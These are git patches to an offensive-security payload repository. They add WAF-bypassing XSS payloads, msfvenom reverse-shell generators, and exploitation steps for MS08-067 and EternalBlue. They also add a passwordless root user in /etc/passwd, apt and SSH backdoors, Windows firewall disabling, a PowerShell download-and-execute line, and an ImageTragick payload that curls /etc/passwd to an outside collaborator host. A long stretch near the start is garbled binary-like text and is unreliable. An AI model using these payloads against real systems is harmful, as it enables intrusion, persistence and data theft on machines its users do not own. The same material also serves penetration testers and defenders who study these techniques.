From edcac293a860ce3182f3124f43d8facf7e7487b0 Mon Sep 17 00:00:00 2001 From: h1-ragnar <51418565+h1-ragnar@users.noreply.github.com> Date: Wed, 5 Jun 2019 21:36:41 +0300 Subject: [PATCH 001/222] Cloudflare XSS Bypasses by Bohdan Korzhynskyi --- XSS Injection/README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7a10f491..af9da316 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -876,6 +876,14 @@ Works for CSP like `script-src self` ## Common WAF Bypass +### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019 + +```html + + +xss'">

*J4(=DI!gp{n=$_L}kJJT$~!I-RJd9=FISYARmO{w$Ce%F)x zk70N#<$m61`Ajq_{WkythIO3H*b}8kOrD_iHRfXD zZr)IT@-b!VV6yIKLJ!9noxMS=ysAj5RyP?#`Iy$xzl-=awEUxpjLqz5M~j5`()u=o z+M|}2UJ?oJt89Es%^@k)i&$%Ei{H&P{#bhV>L@qxXuaqw(Rf$)lhAW`I%SuD@UMf1bAfA5{APb{F8^WBeZ>?%42}1&kHLfW){Z zn6p08ndaS-|H;57`8+Iy*w{wS_0pLwBO@b5szqiSFB zcoPlNd(B-5#mgr}{_ckZ1M=G*J-YE6dPlwEe*<@Z-o{&^GMYI%mi07wi%i*?GW%~E8X->#KbQ%W1*AJ5ztC^N$yAN+7j z0KGVSNHV}qslwYR_+}Er@O+i>8xd80KB1t6{Q~-DLVuInHriz00M`O*HU>htP-|PaubwUsL@3 z)1#x`tE=Xm51jgQqVQ)T?u;97{8a8XZai$#d&_wkySsNHCr!Wi^qaEa8~^xufzieX zGHE5XYX8>H&XT7*9=6X;h-*MQZQ{ql!uB16BZ0JXgu0PP##Lo{m-E8;luBtq6&&=! zjbVAitAgd_mMKle_`m-X)6)Nm!R4Q076!j$86^)4HgH-!oPK`YJgFVaJ7vxe6dj3v zty|Wop1CloI@M9*Xz%H2=6SoR)2;|*M3jq_VE|850e8lu;kM7jKMk`#I~x>H1K)p9 zEFbZ-@4xo~{QnTV|LeYk2wmB*>a2K!Y3nPm(5C~KRSWYZ(5GJwWzR0|E2{{b9f?F- z8;NcC|(bH-qSXQPL^AkqMJKKH{ z-C;Y^4r#DB?P@rEOoM~oBp^e{<%H>XULEBbGcbEGHiwH0tNw$6BLl9pXbovYyenBu z@BUO<1RJf^eB;9!xy(h`q~P|gOXzgBMK!F2+EkfO-F(?f2oaJD6^G*-m9Be6pcwU} zF-a8aLW~8y{6VFQJsz|5qx%Qq4AY4P3Kg!dnMp;;cH62EE#=lYHY|hqBmM#e0j{}k zHahKG&k&g33u(ypgo#&Ljr{ev|0lIHr?fga4I?m5o>6OZzP`}(E18JWeY{$6jr_E5 zY4%ON!dkCmR%4VE!4LPfTPq{$Pb{}M(A@1%sLq+<_C6)1J6wj=wS|3T_QJ@1K){?q zu(na?Awl^mrStCj>uR&tt|r^+Vf+x&O_HB_Nw{@M=Xg;&QDMXSrn1(|M(Vo9SkdasF&YPI-g{Sl&_nibi&6)>KDjaNzPV%ynyD3id(RFR4Gzzbh* zHMowS_4_p$oJT12SJ^stYH!wFW#Z}j0HGLjxsVn1y{dmu+ehuju1L+cd4rgk8QD4e zb+?>tTg86b=Yqb;ej4?oDJp*cCdGAA(YE0|miuy}c1m;HPtj0%YhTK`nprBH@;!Lp zAs^J1cRvTK^Q#_FNFI-B@O0<3Cb5uJ6(Z>eNebT|Q{BEr6b|%~|&P=iHM@)seUy5ktIW)nxc7S&r3%f>2OiTtKYp z@VJ3%|KRFV_KnILX*)ml#5rF(*4;|JG4du7f3xig^B00Feq|$0Z1dj--WyP2z6~ws zT$mq@DKJ7@7=E4JxwWUTJM3UhDa0MAWRN;wLi&fXQ8Qxrf3Lw5C|Z{i9~0SVAY)^Pt_ysqJ!{* zv6)nvzC`P1vxVcAik|W0Sqett>^CF0_=j&Y!f4xbb?Dw4wwXTGrLnnV98aSTxEZB{EWP?tY>3nN)!w z2VGy3bVESHgPm|WFZ4(H3?7BP$NUbe9Ol6MDp zS^u1;^s3b7yNjtJX6f_?hstNY_PDIHHh60i#|Ly1UmRMB=vM=I{3!L&omxI=z!_8a z-LSW1kGT`cPRgOmw4j)J+aaUo?E!l+vO6UXJ<_Ipuu>>%MR&U6^1izUJ(ISbo;6MG zZSFzkgUKl#bX`rhx*Bzv=-X&R!xiuSVvKKOL}O1RDD2%X^J-A>{85aEApEeP5EGuI zyc@9kn6r=lTXrSR7!yXImed;>R&1XSJLoH)?&d~ujM-r1gyL|hV5y%K3ei2H+*=(i zjv~l6M5muf?)=T5K+N#qe-xOZc4Y;Z(kE^u5J~r& z-yX)qNPE8%f~V3EZ1Qf>CiEcXD8yc;>~+Z>zW9QIVY|O5>8E{b7+NFKXk@ka!`)HY zYmKYch_$m%3ax3Y;#o{;%lU&l8+6u&lQq>1eB}+kzYV!n-mH=(FlJL$R!X-3XvRG; z;&0+Nv#R^PjR=bm%xJ!~v@3p^zl>(z z?K-VE>QuiG&zVoVH0=pH*S<`2Tux8bi*l+i-X^?ksAdyGu&tbnGd^~Hef_~})StE@ zL<&Nh52N;7xC7k@M;5r!?1hN@<4Vbvxp>n`|E%TMzgAMcuHYb~sUT!^C-5^Bwwha- zl$%Wa;*Qoq*eeOsNQJ&DE1UMxJz}SwyLG(_QoEhI{9?s2?akYBd?-6wp8^kK!c06} z7^%rL<{R18$2Av`cnI}DD-)*X51iRkXQsqBf@b&EE;a&Rcln&>j zDr4k~uz`peA>{drZTN%UWSHvo*DHn;Zjtjyf$Q-+fzrjb^SvpG(k5 zTherW;a6|>_tW0-h#2N~_#yV3bH_ut9pj5S$>BbSU)HbX3?}H4?Q+hE)sr{M)K49& z+jcW%)Op_9;PoHma%RQV5rP{VIPOfvi?v^{#N8 z@;GO3=W9}W8@I*d_27}iMd4)3Ns`YdjFLmXmpFx>vOs$KF4D)Qzq z20vbp_m8&bSYEEfZEVW3lsISFCzHh#n+|d(yd)c~T0O3H?|biMPZk#<*uDt#zdX@n zY?bghb5vIzQ0d1cc_gJ)ICpxLXCQ`Z?y-zb&#e`x1mMF3X4(rsWu3l0@HDwFmByTYsAc-|YU20wVj)NTE78AC zP+7dV@3fkNQ)}{)bR@ndC)wUwb}Iau^O@`=u*NtIbSv=f+URYL-LcmyLu=vK>`-x{v9Jwx`6y+l+-z z4&zFTLmhN`O7-EF(Hz%3%Ia;wEclc#4=_u^OCwl|t3)neyatluT(UJMUwE;j97VIWL;c^aYNbfJ!& ziK7zn{Y#X}sO&f|>7;BXi)+B6$g3muecvh4ERMVqJKue9T4b;m6!>#_nm>xAH=d|U z==Rv3pvUg>ip~1nb-MU)@j0LBpXGmd^kk4d#PXW*nSHQD>+ zhF=_h%~Ck8i@YcoJ$NY;W98%=sTT>=2kiV;EM?yn4$ajSu$huzhCq__-FttFP9We^ zTXc_TLxbS`W|EBSDq+H|xJlKY7XGl6LfF2Ga+1hS@wUO!?47(6*eTDcDDuJSZTt&U zR%-nLYV)dught8K?J;`Xra6LGmnFy43yL5LcPr@0M+ed$3|yw-?x9dVRNML$z2UoG zk$un4D2|!hW_R=+O+5R%@LxgUSAJHkx?JO_md277&zszD4U(cRE-966CE?hb*lZ=} z8&xGR6#o!i6!6Ul0D#-#m{tlIp8z+K>T#BLq;dUv`Jo~|`!Z#v$1_BhEMT;G+exgUOx z3PW}e_pj(E-O9`I3y>ZkU~Ed&xjvNcNEzWI{9rvy+2(6SV9d>fkLQ`Jr+gy$w+Bwf z8Gm?Lyeyoq_2wsRwW4%Xy0S<|kV4;mEpT5svp-u;y!3OW(AH)CoqST?cEcAKdkv{J zWp88d)~SS8+EKUNXym(Z~_j?HcRHf@o@9LAW zw#P=Tr_X8BFTUx=EW7jBXgaFmS)B9vvA*-#N-XI(5A_6Bs^b_M%4uT5qX zWT%;E@b`Y-M$#a^z7nlmuPwpv6on3@=bUL=PGRgVtWV+sN#OPGfydlha z_SiB#U@3I;DQn6|!8*!C#(iUGn7yexDN<{LSjze)LW;vo-b>SHTe_F3!dEdOI+h{_ zrgUr4I^)q>A~amSiL6H_Ff?*Cx&J+x`itI2Z|RwTy)8<^tPjXsG9KI1tX}2KdG?QvG!=$$I&A_t|lmth^@Liekfk|a0-E$4r(vdB%d&7c~1?j4PiYQ{OQ1SQ2pcz0X! z!f}qL)&?=c8r7%0PIcKjs>{|9`KklW7e3~3Ib3gl=d}<*h?C1Hv8>SG*BM_ByMM?Z zTg|QS(7AP02OIw-lhX?<_`?S2i@g}%>@*nSG4aBDH--U^eGuf%wSM;8os}?lRHNW zD4fic!~2DGFz4FQ+jE*8F2$c-6sxng zi;gGv$5z^s)EQ5-A^>Iu=QTqBNWH8O#cn3NqZP+b@-RXg4YN0qHg^cFo6Gx@k0rS7 zZ|;YCC6@7G@#?e=O#=he{Q)e)oUy&jtr4ul`}Xfh11T5%(obYp8);V;54aDB#yVci z|7<1U?JXQIt?aJfyKNiMiU8@i4#jut#}sb7fRxkS7=D$?^wqITF9T?2e=KEbvA6I? zK93Yoj^3^iM}Nn&6sKa&woy`bX}@KTWn6%S=d}<*h?B?3y$m@(PizhnQeo|$Fu{ny zq+%=nuz|y>Fe*2e??1D>t5=yS2S5x!(p3ST#A=(<6^ z%S4ge#OVbV{_uV$st!+X36keDF)}Cd`;D=A7Hk%U4=Q8HcEm~s;wK_=CqEE2T%t3KkNEw@sVl#Jt@F=jN=j*ki`}}k~wI8)6h;}GM z)1pr>=i9NC#kPbvuP>u*>E77aT&V`Zb@dqET=Ea^XhrjdiB<&g-n>1w5}0O5S|^%; z5z;_6K<&A29qt6ppmS{<7!Z2Ti{=Ys9pQ@Yd!Dxy>nInVyGLS#v{<<#v_D>f5z+|0 zaR{wBjQxm}<9=fa>QtN-QZLG=A_FPsf3A|$%L*~Mt$oVJ z>qES;P83VOV>m;Nx!pJ0luUA$Pa)&iW6}L8io;CGs918?@yvlfZAsM5{+QfW9OvcI z_UKoj#^%uo>!gf}CHL{>J<;*3BVAZZ(`ftsUWn)zT^hkx>d;#w$2=~O_`DWE2yyZ_ zC02&Vgx0X#io>4yFbV_KHoxiYEKgV!gU^QS=r9R?{+dG$IMF$JeZTb-7uTr#p~SMzPbaO zMPX8L-=rX6aL~f%B?jvi~%3Ky|i1wvXmt>;j;ZT3R3aoPxJ!;Z zzm>}Dwb;(^khfy$faW4$Io-hj{6TX5GO6FP@%j*Ntdqs!v5s`%y0M&^iEm*ka*+Dd zqrT=YNju}o`LD@%Z`ekqdo`A_H1b}WhT@9-DN8i(iH?`Q>KvMWzLTn=SHS@L^la?s z182qASY2qA>/etc/passwd +su - dummy +``` + ## NFS Root Squashing @@ -526,6 +534,8 @@ lxc start mycontainer lxc exec mycontainer /bin/sh ``` +Alternatively https://github.com/initstring/lxd_root + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 227d80a7..a9d182f1 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -85,6 +85,7 @@ optional arguments: ```c portfwd list +portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 or diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 3975ad90..45e88b8c 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -172,6 +172,13 @@ List firewall's blocked ports $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports ``` +Disable firewall + +```powershell +netsh firewall set opmode disable +netsh advfirewall set allprofiles state off +``` + List all network shares ```powershell diff --git a/SAML Injection/README.md b/SAML Injection/README.md index 928b56eb..e244bfd1 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability, An XSLT can be carried out by using the `transform` element. -![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) +![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack) ```xml From f5a8a6b62faee0839c7aa49397d9aa11a4eb53a1 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 14:26:14 +0200 Subject: [PATCH 003/222] Meterpreter shell --- .../Metasploit - Cheatsheet.md | 4 +- .../Reverse Shell Cheatsheet.md | 47 +++++++++++++++++++ .../imagetragik2_burpcollaborator_passwd.jpg | 1 + 3 files changed, 51 insertions(+), 1 deletion(-) create mode 100644 Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index c7b99804..4ce0db76 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -58,7 +58,9 @@ set PAYLOAD generic/shell_reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 set ExitOnSession false -exploit -j + +generate -o /tmp/meterpreter.exe -f exe +to_handler [ctrl+a] + [d] ``` diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 41435de8..d20c8f73 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -21,6 +21,12 @@ * [Lua](#lua) * [NodeJS](#nodejs) * [Groovy](#groovy) +* [Meterpreter Shell](#meterpreter-shell) + * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) + * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) + * [Linux Staged reverse TCP](#linux-staged-reverse-tcp) + * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp) + * [Other platforms](#other-platforms) * [Spawn TTY Shell](#spawn-tty-shell) * [References](#references) @@ -231,6 +237,47 @@ String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` +## Meterpreter Shell + +### Windows Staged reverse TCP + +```powershell +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe +``` + +### Windows Stageless reverse TCP + +```powershell +$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe +``` + +### Linux Staged reverse TCP + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf +``` + +### Linux Stageless reverse TCP + +```powershell +$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf +``` + +### Other platforms + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh +$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` + ## Spawn TTY Shell Access shortcuts, su, nano and autocomplete in a partially tty shell diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg new file mode 100644 index 00000000..358edb6c --- /dev/null +++ b/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg @@ -0,0 +1 @@ +push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context \ No newline at end of file From adcea1a9132d46a0c9fac0b770401326601acf12 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 16:05:44 +0200 Subject: [PATCH 004/222] Linux PrivEsc + SSH persistency --- Directory Traversal/README.md | 9 ++++ .../Linux - Persistence.md | 8 +++ .../Linux - Privilege Escalation.md | 1 + ...tion.md => Methodology and enumeration.md} | 0 .../Reverse Shell Cheatsheet.md | 2 +- .../Windows - Privilege Escalation.md | 54 +++++++++++++++++++ .../Windows - Using credentials.md | 38 +++++++------ README.md | 4 +- 8 files changed, 96 insertions(+), 20 deletions(-) rename Methodology and Resources/{Methodology_and_enumeration.md => Methodology and enumeration.md} (100%) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index b746ffa7..2be85205 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -4,9 +4,18 @@ ## Summary +* [Tools](#tools) * [Basic exploitation](#basic-exploitation) * [Path Traversal](#path-traversal) +## Tools + +- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) + ```powershell + git clone https://github.com/wireghoul/dotdotpwn + perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b + ``` + ## Basic exploitation We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index a80c802f..f39abf5c 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -79,6 +79,14 @@ Next time "apt-get update" is done, your CMD will be executed! echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor ``` +## Backdooring the SSH + +Add an ssh key into the `~/.ssh` folder. + +1. `ssh-keygen` +2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys` +3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys + ## Tips Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index dfae6bd8..36820bcc 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -392,6 +392,7 @@ echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` +NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. ## NFS Root Squashing diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology and enumeration.md similarity index 100% rename from Methodology and Resources/Methodology_and_enumeration.md rename to Methodology and Resources/Methodology and enumeration.md diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index d20c8f73..41e0926b 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -282,7 +282,7 @@ $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw Access shortcuts, su, nano and autocomplete in a partially tty shell -/!\ OhMyZSH might break this trick, a simple `sh` is recommended +:warning: OhMyZSH might break this trick, a simple `sh` is recommended > The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 45e88b8c..5e820c0a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -17,6 +17,7 @@ * [EoP - Runas](#eop---runas) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures) * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) + * [MS08-067 (NetAPI)](#ms08-067-netapi) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) @@ -24,6 +25,9 @@ - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) + ```powershell + powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 + ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) ```powershell @@ -623,6 +627,37 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" ``` +### MS08-067 (NetAPI) + +Check the vulnerability with the following nmap script. + +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 +``` + +Metasploit modules to exploit `MS08-067 NetAPI`. + +```powershell +exploit/windows/smb/ms08_067_netapi +``` + +If you can't use Metasploit and only want a reverse shell. + +```powershell +https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows + +Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 +Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) +Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal +Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English +Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) +Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) +Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) +python ms08-067.py 10.0.0.1 6 445 +``` + + ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Check if the patch is installed : `wmic qfe list | find "3139914"` @@ -639,12 +674,31 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc ### MS17-010 (Eternal Blue) +Check the vulnerability with the following nmap script. + ```c nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 ``` +Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. +```powershell +auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution +auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection +exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption +exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ +exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution +``` +If you can't use Metasploit and only want a reverse shell. + +```powershell +git clone https://github.com/helviojunior/MS17-010 + +# generate a simple reverse shell to use +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe +python2 send_and_execute.py 10.0.0.1 revshell.exe +``` ## References diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 1d32e8ce..0234bbbb 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -40,9 +40,9 @@ Password: pw123 ```c use auxiliary/scanner/smb/smb_login -set SMBDomain CSCOU -set SMBUser jarrieta -set SMBPass nastyCutt3r +set SMBDomain DOMAIN +set SMBUser username +set SMBPass password services -p 445 -R run creds @@ -55,8 +55,8 @@ Note: the password can be replaced by a hash to execute a `pass the hash` attack ```c use exploit/windows/smb/psexec set RHOST 10.2.0.3 -set SMBUser jarrieta -set SMBPass nastyCutt3r +set SMBUser username +set SMBPass password set PAYLOAD windows/meterpreter/bind_tcp run shell @@ -66,8 +66,8 @@ shell ```python git clone https://github.com/byt3bl33d3r/CrackMapExec.github -python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r -python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami +python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password +python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami ``` ## Crackmapexec (Pass The Hash) @@ -79,23 +79,27 @@ cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:55 ## Winexe (Integrated to Kali) ```python -winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe +winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe ``` ## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) ```python git clone https://github.com/CoreSecurity/impacket.git -python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 +python psexec.py DOMAIN/username:password@10.10.10.10 +python smbexec.py DOMAIN/username:password@10.10.10.10 +python wmiexec.py DOMAIN/username:password@10.10.10.10 + +# psexec.exe -s cmd +# switch admin user to NT Authority/System ``` ## RDP Remote Desktop Protocol (Impacket) ```powershell -python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare +python rdpcheck.py DOMAIN/username:password@10.10.10.10 +rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare +rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 # -g : the screen will take up 70% of your actual screen size # -r disk:share : sharing a local folder during a remote desktop session ``` @@ -137,21 +141,21 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 ## Netuse (Windows) ```powershell -net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r +net use \\ordws01.cscou.lab /user:DOMAIN\username password C$ ``` ## Runas (Windows - Kerberos auth) ```powershell -runas /netonly /user:CSCOU\jarrieta "cmd.exe" +runas /netonly /user:DOMAIN\username "cmd.exe" ``` ## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ) ```powershell -PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell ``` ## References diff --git a/README.md b/README.md index 4a990dc8..5b27360a 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I :heart: pull requests :) -You can also contribute with a beer IRL or with `buymeacoffee.com` +You can also contribute with a :beers: IRL or with `buymeacoffee.com` [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky) @@ -22,7 +22,7 @@ You might also like the `Methodology and Resources` folder : - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md) - [Linux - Privilege 